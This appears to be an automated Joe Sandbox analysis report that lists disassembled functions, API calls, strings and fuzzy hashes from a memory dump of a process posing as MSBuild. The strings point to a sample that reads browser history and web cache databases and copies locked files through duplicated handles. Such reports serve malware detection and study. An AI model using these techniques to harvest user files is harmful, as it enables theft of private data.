                                                                                                                                            • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                            • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                            • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 004087D6
                                                                                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                              • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                            • memset.MSVCRT ref: 00408828
                                                                                                                                            • memset.MSVCRT ref: 00408840
                                                                                                                                            • memset.MSVCRT ref: 00408858
                                                                                                                                            • memset.MSVCRT ref: 00408870
                                                                                                                                            • memset.MSVCRT ref: 00408888
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2911713577-0
                                                                                                                                            • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                            • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                            • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                            • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                            APIs
                                                                                                                                            • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                                            • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                                            • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcmp
                                                                                                                                            • String ID: @ $SQLite format 3
                                                                                                                                            • API String ID: 1475443563-3708268960
                                                                                                                                            • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                                                            • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                            • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                                                            • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                            • memset.MSVCRT ref: 00414C87
                                                                                                                                            • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                            • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                              • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                            Strings
                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                            • API String ID: 2705122986-2036018995
                                                                                                                                            • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                            • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                            • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                            • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcsicmpqsort
                                                                                                                                            • String ID: /nosort$/sort
                                                                                                                                            • API String ID: 1579243037-1578091866
                                                                                                                                            • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                            • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                            • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                            • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 0040E60F
                                                                                                                                            • memset.MSVCRT ref: 0040E629
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                            Strings
                                                                                                                                            • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                            • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                                            • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                            • API String ID: 3354267031-2114579845
                                                                                                                                            • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                            • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                            • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                            • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                            APIs
                                                                                                                                            • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
• LoadResource.KERNEL32(?,00000000), ref: 004148E4
• LockResource.KERNEL32(00000000), ref: 004148EF
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
• Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
• Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
• Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
• Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
APIs
Strings
• only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: memset
• String ID: only a single result allowed for a SELECT that is part of an expression
• API String ID: 2221118986-1725073988
• Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
• Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
• Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
• Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
APIs
• ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
• DeleteObject.GDI32(00000000), ref: 004125E7
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: ??3@DeleteObject
• String ID: r!A
• API String ID: 1103273653-628097481
• Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
• Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
• Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
• Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
APIs
• ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: ??2@
• String ID:
• API String ID: 1033339047-0
• Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
• Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
• Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
• Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
APIs
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
• memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: AddressProc$memcmp
• String ID: $$8
• API String ID: 2808797137-435121686
• Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
• Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
• Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
• Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
Strings
• duplicate column name: %s, xrefs: 004307FE
• too many columns on %s, xrefs: 00430763
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID:
• String ID: duplicate column name: %s$too many columns on %s
• API String ID: 0-1445880494
• Opcode ID: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
• Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
• Opcode Fuzzy Hash: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
• Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
APIs
  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
  • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
  • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
• CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
  • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76E22EE0), ref: 0040E3EC
• DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
• CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
  • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
• String ID:
• API String ID: 1979745280-0
• Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
• Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
• Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
• Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
APIs
  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
• memset.MSVCRT ref: 00403A55
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
• String ID: history.dat$places.sqlite
• API String ID: 2641622041-467022611
• Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
• Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
• Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
• Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
APIs
  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
• ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
• GetLastError.KERNEL32 ref: 00417627
Memory Dump Source
• Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
Similarity
• API ID: ErrorLast$File$PointerRead
• String ID:
• API String ID: 839530781-0
• Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
• Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
• Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
• Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                            • String ID: *.*$index.dat
                                                                                                                                            • API String ID: 1974802433-2863569691
                                                                                                                                            • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                            • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                            • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                            • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                            APIs
                                                                                                                                            • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                            • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                            • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$FilePointer
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1156039329-0
                                                                                                                                            • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                            • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                            • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                            • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                            • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                            • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CloseCreateHandleTime
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3397143404-0
                                                                                                                                            • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                            • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                            • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                            • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                            APIs
                                                                                                                                            • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                            • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1125800050-0
                                                                                                                                            • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                            • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                            • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                            • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                            • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseHandleSleep
                                                                                                                                            • String ID: }A
                                                                                                                                            • API String ID: 252777609-2138825249
                                                                                                                                            • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                            • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                            • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                            • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                            APIs
                                                                                                                                            • malloc.MSVCRT ref: 00409A10
                                                                                                                                            • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                            • free.MSVCRT ref: 00409A31
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: freemallocmemcpy
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3056473165-0
                                                                                                                                            • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                            • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                            • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                            • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_400000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: d
                                                                                                                                            • API String ID: 0-2564639436
                                                                                                                                            • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                            • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                            • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                            • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
